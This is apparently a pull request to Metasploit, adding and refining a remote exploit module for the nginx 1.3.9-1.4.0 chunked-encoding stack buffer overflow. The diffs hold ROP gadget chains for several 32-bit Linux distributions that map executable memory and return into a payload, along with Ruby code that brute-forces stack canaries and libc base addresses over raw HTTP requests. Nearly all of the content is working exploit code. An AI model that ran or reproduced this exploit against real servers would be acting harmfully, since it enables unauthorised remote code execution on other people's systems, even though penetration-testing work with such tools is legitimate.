### PR TITLE
Exploit module for nginx chunked stack buffer overflow.

### DIFF
--- a/data/ropdb/nginx.xml
+++ b/data/ropdb/nginx.xml
@@ -140,4 +140,74 @@
             <gadget offset="0x000f59fb">call eax ; pop ebx ; pop ebp ;;</gadget>
         </gadgets>
     </rop>
+
+    <rop>
+        <compatibility>
+            <target>Ubuntu 13.04</target>
+        </compatibility>
+
+        <!--
+        dpkg -l | grep libc-* ii  libc-bin 2.17-0ubuntu5 i386 Embedded GNU C Library: Binaries
+        b7573000-b7720000 r-xp 00000000 08:01 917528     /lib/i386-linux-gnu/libc-2.17.so
+        b7722000-b7723000 rw-p 001af000 08:01 917528     /lib/i386-linux-gnu/libc-2.17.so
+        -->
+
+        <gadgets base="0">
+            <gadget offset="0x00001aa6">pop edx</gadget>
+            <gadget value ="0x080c5188">mmap64</gadget>
+            <gadget offset="0x0002fa17">xor eax, eax</gadget>
+            <gadget offset="0x0013b978">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00083ad1">sub eax, 1</gadget>
+            <gadget offset="0x00083ad1">sub eax, 1</gadget>
+            <gadget offset="0x00083ad1">sub eax, 1</gadget>
+            <gadget offset="0x00083ad1">sub eax, 1</gadget>
+            <gadget offset="0x0002e09f">mov [eax], ecx</gadget>
+            <gadget offset="0x00003729">xchg ebp, eax</gadget>
+            <gadget offset="0x00002fa17">xor eax, eax</gadget>
+            <gadget offset="0x0013b978">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x0012b870">mov eax [edx] ; add esp 0xc</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000edea4">call eax ; add esp 0x28 ; pop ebx</gadget>
+            <gadget value ="0x00000000">addr</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000007">PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+            <gadget value ="0x00000022">MAP_PRIVATE | MAP_ANON</gadget>
+            <gadget value ="0xffffffff">filedes</gadget>
+            <gadget value ="0x00000000">off_t</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00115bc5">push esp ; pop ebx ; pop esi</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+	        <gadget offset="0x0007fedd">mov edi eax ; mov esi edx ; mov eax [esp+0x4]</gadget>
+            <gadget offset="0x000f15e4">xchg ebx ecx</gadget>
+            <gadget offset="0x0014eb83">mov eax ecx</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x0011334a">add eax 0xc ;;</gadget>
+            <gadget offset="0x00113988">add eax 0x8 ;;</gadget>
+            <gadget offset="0x000ceb8c">push eax ; xor eax eax ; pop esi</gadget>
+            <gadget offset="0x0002e8bb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000200">payload size (in dwords)</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x0007f8fc">rep movsd ; xchg edi eax ; mov esi edx ;; </gadget>
+            <gadget offset="0x0002e8bb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x00145528">sub eax, ecx</gadget>
+            <gadget offset="0x0007ec86">call eax</gadget>
+
+        </gadgets>
+    </rop>
+
 </db>

--- a/data/ropdb/nginx.xml
+++ b/data/ropdb/nginx.xml
@@ -1,0 +1,143 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<db>
+    <rop>
+        <compatibility>
+            <target>Kali Linux 1.0</target>
+        </compatibility>
+
+        <!--
+        dpkg -l libc-* ii  libc-bin 2.13-38 i386 Embedded GNU C Library: Binaries
+        b7533000-b768f000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
+        b7692000-b7693000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
+        -->
+
+        <gadgets base="0">
+            <gadget offset="0x00001aa6">pop edx</gadget>
+            <gadget value ="0x080c429c">mmap64.plt</gadget>
+            <gadget offset="0x00078b14">xor eax, eax</gadget>
+            <gadget offset="0x0011d795">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x000d5c5a">sub eax, 1</gadget>
+            <gadget offset="0x0002a137">mov [eax], ecx</gadget>
+            <gadget offset="0x00003689">xchg ebp, eax</gadget>
+            <gadget offset="0x00078b14">xor eax, eax</gadget>
+            <gadget offset="0x0011d795">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x0006efb0">mov eax [edx] ; mov [ecx] eax ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00125ec9">call eax ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0x00000000">addr</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget offset="0x000eb9f7">add esp 0x10 ; pop ebx ; pop ebp ;; (Also flags: PROT_READ | PROT_WRITE | PROT_EXEC)</gadget>
+            <gadget value ="0x00000022">MAP_PRIVATE | MAP_ANON</gadget>
+            <gadget value ="0xffffffff">filedes</gadget>
+            <gadget value ="0x00000000">off_t</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00103dbe">push esp ; pop ebx ; pop esi ; pop edi ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000ab68d">xchg ebx eax ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x000f66ad">add eax 0xc ;;</gadget>
+            <gadget offset="0x0007fa9c">add eax 0x8 ;;</gadget>
+            <gadget offset="0x000b0edc">push eax ; xor eax eax ; pop esi ; pop ebp ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000ab68d">xchg ebx eax ;;</gadget>
+            <gadget offset="0x000c9325">xchg edi eax ;;</gadget>
+            <gadget offset="0x000e2c02">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000200">payload size (in dwords)</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x0007a35c">rep movsd ; xchg edi eax ; mov esi edx ;; </gadget>
+            <gadget offset="0x0002a6eb">pop ecx, pop edx</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x00121fd8">sub eax, ecx</gadget>
+            <gadget offset="0x000e2abb">call eax ; pop ebx ; pop ebp ;;</gadget>
+	   </gadgets>
+    </rop>
+
+    <rop>
+        <compatibility>
+            <target>Red Hat Enterprise Linux 6.4</target>
+        </compatibility>
+
+        <!--
+        rpm -qa | grep libc- glibc-2.12-1.107.el6.i686
+        001a1000-00335000 r-xp 00000000 ca:41 14763      /lib/i686/nosegneg/libc-2.12.so
+        00337000-00338000 rw-p 00196000 ca:41 14763      /lib/i686/nosegneg/libc-2.12.so
+        -->
+
+        <gadgets base="0">
+            <gadget offset="0x00001aa6">pop edx</gadget>
+            <gadget value ="0x080b42d4">mmap64</gadget>
+            <gadget offset="0x0007a414">xor eax, eax</gadget>
+            <gadget offset="0x00139aa0">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x000e57ca">sub eax, 1</gadget>
+            <gadget offset="0x0002a4e7">mov [eax], ecx</gadget>
+            <gadget offset="0x00003671">xchg ebp, eax</gadget>
+            <gadget offset="0x0007a414">xor eax, eax</gadget>
+            <gadget offset="0x00139aa0">add eax ecx ; pop ebx ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x0006fc30">mov eax [edx] ; mov [ecx] eax ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00145519">call eax ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0x00000000">addr</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget offset="0x000a0677">add esp 0x20 ; pop ebx ; pop ebp ;; (Also flags: PROT_READ | PROT_WRITE | PROT_EXEC)</gadget>
+            <gadget value ="0x00000022">MAP_PRIVATE | MAP_ANON</gadget>
+            <gadget value ="0xffffffff">filedes</gadget>
+            <gadget value ="0x00000000">off_t</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x000bc833">push esp ; pop ebx ; pop esi ; pop edi ; pop ebp</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00168d09">xchg ebx eax ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b2c">add eax 0xc ;;</gadget>
+            <gadget offset="0x00081b1c">add eax 0x8 ;;</gadget>
+            <gadget offset="0x000b00cc">push eax ; xor eax eax ; pop esi ; pop ebp ;;</gadget>
+            <gadget value ="0x00000000">Garbage</gadget>
+            <gadget offset="0x00168d09">xchg ebx eax ;;</gadget>
+            <gadget offset="0x0016d283">xchg edi eax ;;</gadget>
+            <gadget offset="0x0002aacb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000200">payload size (in dwords)</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x0007bd3c">rep movsd ; xchg edi eax ; mov esi edx ;; </gadget>
+            <gadget offset="0x0002aacb">pop ecx ; pop edx ;;</gadget>
+            <gadget value ="0x00000800">payload size</gadget>
+            <gadget value ="0x00000000">garbage</gadget>
+            <gadget offset="0x00141218">sub eax, ecx</gadget>
+            <gadget offset="0x000f59fb">call eax ; pop ebx ; pop ebp ;;</gadget>
+        </gadgets>
+    </rop>
+</db>

--- a/data/ropdb/nginx.xml
+++ b/data/ropdb/nginx.xml
@@ -210,4 +210,60 @@
         </gadgets>
     </rop>
 
+    <rop>
+        <compatibility>
+            <target>Debian Squeeze</target>
+        </compatibility>
+
+        <!--
+        dpkg -l | grep libc*  ii libc-bin 2.11.3-4 Embedded GNU C Library: Binaries
+        b75f5000-b7735000 r-xp 00000000 08:01 157287     /lib/i686/cmov/libc-2.11.3.so
+        b7738000-b7739000 rw-p 00142000 08:01 157287     /lib/i686/cmov/libc-2.11.3.so
+        -->
+
+        <gadgets base="0">
+            <!-- mmap rwx memory -->
+            <gadget value ="0x0804a210">mmap64@plt</gadget>
+            <gadget offset="0x000b744b">add esp 0x1c ; leave</gadget>
+            <gadget value ="0x31337000">map destination</gadget>
+            <gadget value ="0x00001000">size</gadget>
+            <gadget value ="0x00000007">PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
+            <gadget value ="0x00000031">MAP_PRIVATE | MAP_ANON | MAP_FIXED</gadget>
+            <gadget value ="0xffffffff">fildes</gadget>
+            <gadget value ="0x00000000">offset</gadget>
+            <gadget value ="0x00000000"></gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+
+            <!-- put stack location in eax and adjust it to point to src param for memcpy -->
+            <gadget offset="0x000c2bc7">push esp ; xor eax, eax ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget offset="0x000cc3f6">xchg ecx, ebx ; pop ebp</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget offset="0x000709e0">mov edi, ecx ; mov eax, edi ; pop edi ; pop ebp</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget value ="0x0000004c">add to eax</gadget>
+            <gadget offset="0x000658e7">add eax, ebp</gadget>
+
+            <!-- move original stack location in [eax] -->
+            <gadget offset="0x0007487d">mov edi, eax ; mov esi, edx ; mov eax, [esp+4]</gadget>
+            <gadget offset="0x000c4262">mov eax, ecx ; pop ebx ; pop ebp</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget offset="0x0002c528">mov [edi], eax ; pop eax ; pop ebx ; pop esi ; pop edi</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+            <gadget value ="0xffffffff">garbage</gadget>
+
+            <!-- call memcpy and return into payload -->
+            <gadget value ="0x08049f10">memcpy@plt</gadget>
+            <gadget value ="0x31337054">return into payload</gadget>
+            <gadget value ="0x31337000">dest</gadget>
+            <gadget value ="0xffffffff">src (overwritten by stack location)</gadget>
+            <gadget value ="0x00001000">size</gadget>
+
+        </gadgets>
+    </rop>
+
+
 </db>

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -13,6 +13,7 @@ class Metasploit4 < Msf::Exploit::Remote
 	include Msf::Exploit::Brute
 
 	def initialize(info = {})
+
 		super(update_info(info,
 			'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
 			'Description'    => %q{
@@ -74,6 +75,23 @@ class Metasploit4 < Msf::Exploit::Remote
 								}
 						}
 					],
+					[
+						'Ubuntu 13.04',
+					{
+						'Arch' => ARCH_X86,
+						'Ropname' => 'Ubuntu 13.04',
+						'Platform' => 'linux',
+						'CanaryOffset' => 4971,
+						'Offset' => 12,
+						'Bruteforce' =>
+							{
+								'Start' => { 'libc_base' => 0xb7470000},
+								'Stop'  => { 'libc_base' => 0xb757f000},
+								'Step'  => 0x1000
+							}
+						}
+					],
+
 				],
 
 			'DefaultTarget' => 0
@@ -108,7 +126,14 @@ class Metasploit4 < Msf::Exploit::Remote
 
 		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
 
-		data = 	"A" * target['Offset']
+		if target['CanaryOffset'].nil?
+			data = 	"A" * target['Offset']
+		else
+			data = 	"A"*target['CanaryOffset']
+			data <<	[datastore['canary']].pack('V')
+			data << "A"*target['Offset']
+		end
+
 		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
 		data << payload.encoded
 
@@ -128,5 +153,65 @@ class Metasploit4 < Msf::Exploit::Remote
 		handler
 	end
 
+	def exploit
+		if target['CanaryOffset'].nil?
+			print_status("Target not using a stack canary")
+		else
+			print_status("Searching for stack canary")
+			canary = find_canary
+
+			if canary.nil?
+				print_error("Unable to find stack canary.  Quiting")
+				return
+			else
+				print_status("Canary found: 0x%08x\n" % canary)
+				datastore['canary'] = canary
+			end
+		end
+
+		super
+	end
+
+	def find_canary
+
+		# First byte of the canary is already known
+		canary = "\x00"
+
+		# We are going to bruteforce the next 3 bytes one at a time
+		3.times do |c|
+			print_status("Bruteforcing byte #{c + 1}")
+
+			0.upto(255) do |i|
+				begin
+					data = 	"A"*target['CanaryOffset']
+					data <<	canary
+					data << i.chr
+
+					res = send_request_raw({
+						'uri' => 	'/',
+						'headers' =>  {
+							'Transfer-Encoding' => "Chunked",
+						},
+						'data' => data
+					}, 1)
+
+					unless res.nil?
+						print_status("Byte #{c + 1} found: 0x%02x\n" % i)
+						canary << i.chr
+						break
+					end
+
+				rescue Errno::ECONNRESET => e
+					# This is expected
+				end
+			end
+		end
+
+		if canary == "\x00"
+			return nil
+		else
+			return canary.unpack('V').first
+		end
+	end
 end
 

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -16,15 +16,16 @@ class Metasploit4 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
 			'Description'    => %q{
-				This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() 
-                by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible. 
+				This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers
+				an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size.
+				This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.
 			},
-			'Author'         => 
-                [
-                    'Greg MacManus',    # original discovery
-                    'hal',              # exploit development
-                    'saelo'             # exploit development
-                ],
+			'Author'         =>
+				[
+					'Greg MacManus',    # original discovery
+					'hal',              # exploit development
+					'saelo'             # exploit development
+			],
 			'DisclosureDate' => 'May 07 2013',
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -76,12 +77,7 @@ class Metasploit4 < Msf::Exploit::Remote
 				],
 
 			'DefaultTarget' => 0
-        ))
-
-		register_advanced_options(
-			[
-				OptInt.new("StackCanary", [false, "Use this value as stack canary", "0xffffffff"])
-			], self.class)
+	))
 
 	end
 

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -14,11 +14,17 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Nginx HTTP Server 1.3.9/1.4.0 Chuncked Encoding Stack Buffer Overflow',
+			'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
 			'Description'    => %q{
-				This module exploits a stack buffer overflow in 1.3.9 and 1.4.0 of nginx.
+				This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() 
+                by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible. 
 			},
-			'Author'         => 'hal',
+			'Author'         => 
+                [
+                    'Greg MacManus',    # original discovery
+                    'hal',              # exploit development
+                    'saelo'             # exploit development
+                ],
 			'DisclosureDate' => 'May 07 2013',
 			'License'        => MSF_LICENSE,
 			'References'     =>
@@ -69,7 +75,14 @@ class Metasploit4 < Msf::Exploit::Remote
 					],
 				],
 
-			'DefaultTarget' => 0))
+			'DefaultTarget' => 0
+        ))
+
+		register_advanced_options(
+			[
+				OptInt.new("StackCanary", [false, "Use this value as stack canary", "0xffffffff"])
+			], self.class)
+
 	end
 
 	def check
@@ -80,7 +93,7 @@ class Metasploit4 < Msf::Exploit::Remote
 				'uri' => '/'
 			})
 
-			if res and res.code == 200 and res.headers['Server'] =~ /nginx\/(1\.3\.9|1\.4\.0)/
+			if res and res.code == 200 and res.headers['Server'] =~ /nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/
 				return Exploit::CheckCode::Appears
 			elsif res and res.code == 200 and res.headers['Server'] =~ /nginx/
 				return Exploit::CheckCode::Detected

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -46,7 +46,7 @@ class Metasploit4 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					[
-						'Kali Linux 1.0',
+						'Kali Linux 1.0 32bit - nginx 1.4.0',
 						{
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Kali Linux 1.0',
@@ -61,7 +61,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						},
 					],
 					[
-						'Red Hat Enterprise Linux 6.4',
+						'Red Hat Enterprise Linux 6.4 32bit - nginx 1.4.0',
 						{
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Red Hat Enterprise Linux 6.4',
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						}
 					],
 					[
-						'Ubuntu 13.04',
+						'Ubuntu 13.04 32bit - nginx 1.4.0',
 					{
 						'Arch' => ARCH_X86,
 						'Ropname' => 'Ubuntu 13.04',
@@ -91,6 +91,21 @@ class Metasploit4 < Msf::Exploit::Remote
 							}
 						}
 					],
+					[
+						'Debian Squeeze 32bit - nginx 1.4.0',
+					{
+						'Arch' => ARCH_X86,
+						'Ropname' => 'Debian Squeeze',
+						'Platform' => 'linux',
+						'Offset' => 5130,
+						'Bruteforce' =>
+							{
+								'Start' => { 'libc_base' => 0xb74f0000},
+								'Stop'  => { 'libc_base' => 0xb75ff000},
+								'Step'  => 0x1000
+							}
+						}
+					],
 
 				],
 
@@ -98,8 +113,8 @@ class Metasploit4 < Msf::Exploit::Remote
 	))
 
 	register_options([
-   		OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
-	], self.class)
+			OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
+		], self.class)
 
 	register_advanced_options(
 		[
@@ -129,6 +144,10 @@ class Metasploit4 < Msf::Exploit::Remote
 
 	end
 
+	#
+	# Generate a random chunk size that will always result
+	# in a negative 64bit number when being parsed
+	#
 	def random_chunk_size(bytes=16)
 		return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
 	end
@@ -172,8 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote
 			data << Rex::Text.rand_text_hex(target['Offset'])
 		end
 
-		data <<	generate_rop_payload('nginx', payload.encoded,{'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
-		data << payload.encoded
+		data <<	generate_rop_payload('nginx', payload.encoded, {'target'=>target['Ropname'], 'base'=> target_addrs['libc_base'] })
 
 		begin
 			send_request_fixed(data)
@@ -198,7 +216,7 @@ class Metasploit4 < Msf::Exploit::Remote
 				canary = find_canary
 
 				if canary.nil? or canary == 0x00000000
-					print_error("Unable to find stack canary.  Quiting")
+					print_error("Unable to find stack canary. Quiting")
 					return
 				else
 					print_status("Canary found: 0x%08x\n" % canary)
@@ -208,7 +226,7 @@ class Metasploit4 < Msf::Exploit::Remote
 		end
 
 		if datastore['LIBC_BASE'] == 0xffffffff
-			# brute force the base address
+			# Brute force the base address
 			super
 		else
 			brute_exploit({'libc_base' => datastore['LIBC_BASE']})

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	include Exploit::Remote::HttpClient
+	include Exploit::Remote::Tcp
 	include Msf::Exploit::RopDb
 	include Msf::Exploit::Brute
 
@@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Kali Linux 1.0',
 							'Platform' => 'linux',
-							'Offset' => 5024,
+							'Offset' => 5114,
 							'Bruteforce' =>
 								{
 									'Start' => { 'libc_base' => 0xb74c0000},
@@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Remote
 							'Arch' => ARCH_X86,
 							'Ropname' => 'Red Hat Enterprise Linux 6.4',
 							'Platform' => 'linux',
-							'Offset' => 5048,
+							'Offset' => 5130,
 							'Bruteforce' =>
 								{
 									'Start' => { 'libc_base' => 0x00110000},
@@ -81,7 +81,7 @@ class Metasploit4 < Msf::Exploit::Remote
 						'Arch' => ARCH_X86,
 						'Ropname' => 'Ubuntu 13.04',
 						'Platform' => 'linux',
-						'CanaryOffset' => 4962,
+						'CanaryOffset' => 5050,
 						'Offset' => 12,
 						'Bruteforce' =>
 							{
@@ -109,13 +109,11 @@ class Metasploit4 < Msf::Exploit::Remote
 		@peer = "#{rhost}:#{rport}"
 
 		begin
-			res = send_request_cgi({
-				'uri' => '/'
-			})
+			res = send_request_fixed(nil)
 
-			if res and res.code == 200 and res.headers['Server'] =~ /nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/
+			if res =~ /nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/
 				return Exploit::CheckCode::Appears
-			elsif res and res.code == 200 and res.headers['Server'] =~ /nginx/
+			elsif res =~ /nginx/
 				return Exploit::CheckCode::Detected
 			end
 
@@ -131,19 +129,41 @@ class Metasploit4 < Msf::Exploit::Remote
 		return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
 	end
 
+	def send_request_fixed(data)
+		connect
+
+		request = 	"GET / HTTP/1.1\r\n"
+		request <<	"Host: #{Rex::Text.rand_text_alpha(16)}\r\n"
+		request <<	"Transfer-Encoding: Chunked\r\n"
+		request <<	"\r\n"
+		request <<	"#{data}"
+
+		sock.put(request)
+
+		res = nil
+
+		begin
+			res = sock.get_once(-1, 0.5)
+		rescue EOFError => e
+			# Ignore
+		end
+
+		disconnect
+		return res
+
+	end
+
 	def brute_exploit(target_addrs)
 		connect
 
 		print_status("Sending #{payload.encoded.length} byte payload at base 0x%08x" % target_addrs['libc_base'])
 
-		data = random_chunk_size
-
 		if target['CanaryOffset'].nil?
-			data = 	random_chunk_size(876)
-			data <<	Rex::Text.rand_text_alpha(datastore['Offset'] - data.size)
+			data = 	random_chunk_size(1024)
+			data <<	Rex::Text.rand_text_alpha(target['Offset'] - data.size)
 		else
-			data = 	random_chunk_size(876)
-			data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
+			data = 	random_chunk_size(1024)
+			data <<	Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
 			data <<	[datastore['CANARY']].pack('V')
 			data << Rex::Text.rand_text_hex(target['Offset'])
 		end
@@ -152,13 +172,8 @@ class Metasploit4 < Msf::Exploit::Remote
 		data << payload.encoded
 
 		begin
-			send_request_raw({
-				'uri' => 	'/',
-				'headers' =>  {
-					'Transfer-Encoding' => "Chunked",
-				},
-				'data' => data
-			}, 2)
+			send_request_fixed(data)
+
 		rescue Errno::ECONNRESET => e
 			# Ignore
 		end
@@ -170,13 +185,7 @@ class Metasploit4 < Msf::Exploit::Remote
 	def exploit
 		if target['CanaryOffset'].nil?
 			print_status("Target not using a stack canary")
-
-			# Update Offset based on the length of RHOST
-			datastore['Offset'] = target['Offset'] + datastore['RHOST'].size
-
 		else
-			# Update canary offset based on the length of RHOST
-			datastore['CanaryOffset'] = target['CanaryOffset'] + datastore['RHOST'].size
 
 			if not datastore['CANARY'] == 0xffffffff
 				print_status("Using 0x%08x as stack canary" % datastore['CANARY'])
@@ -212,28 +221,15 @@ class Metasploit4 < Msf::Exploit::Remote
 			print_status("Bruteforcing byte #{c + 1}")
 
 			0.upto(255) do |i|
-				begin
-					data = 	random_chunk_size(876)
-					data <<	Rex::Text.rand_text_alpha(datastore['CanaryOffset'] - data.size)
-					data <<	canary
-					data << i.chr
+				data = 	random_chunk_size(1024)
+				data <<	Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
+				data <<	canary
+				data << i.chr
 
-					res = send_request_raw({
-						'uri' => 	'/',
-						'headers' =>  {
-							'Transfer-Encoding' => "Chunked",
-						},
-						'data' => data
-					}, 1)
-
-					if res and not res.code == 200
-						print_status("Byte #{c + 1} found: 0x%02x\n" % i)
-						canary << i.chr
-						break
-					end
-
-				rescue Errno::ECONNRESET => e
-					# This is expected
+				unless send_request_fixed(data).nil?
+					print_status("Byte #{c + 1} found: 0x%02x\n" % i)
+					canary << i.chr
+					break
 				end
 			end
 		end

--- a/modules/exploits/linux/http/nginx_chunked_size.rb
+++ b/modules/exploits/linux/http/nginx_chunked_size.rb
@@ -97,6 +97,10 @@ class Metasploit4 < Msf::Exploit::Remote
 			'DefaultTarget' => 0
 	))
 
+	register_options([
+   		OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
+	], self.class)
+
 	register_advanced_options(
 		[
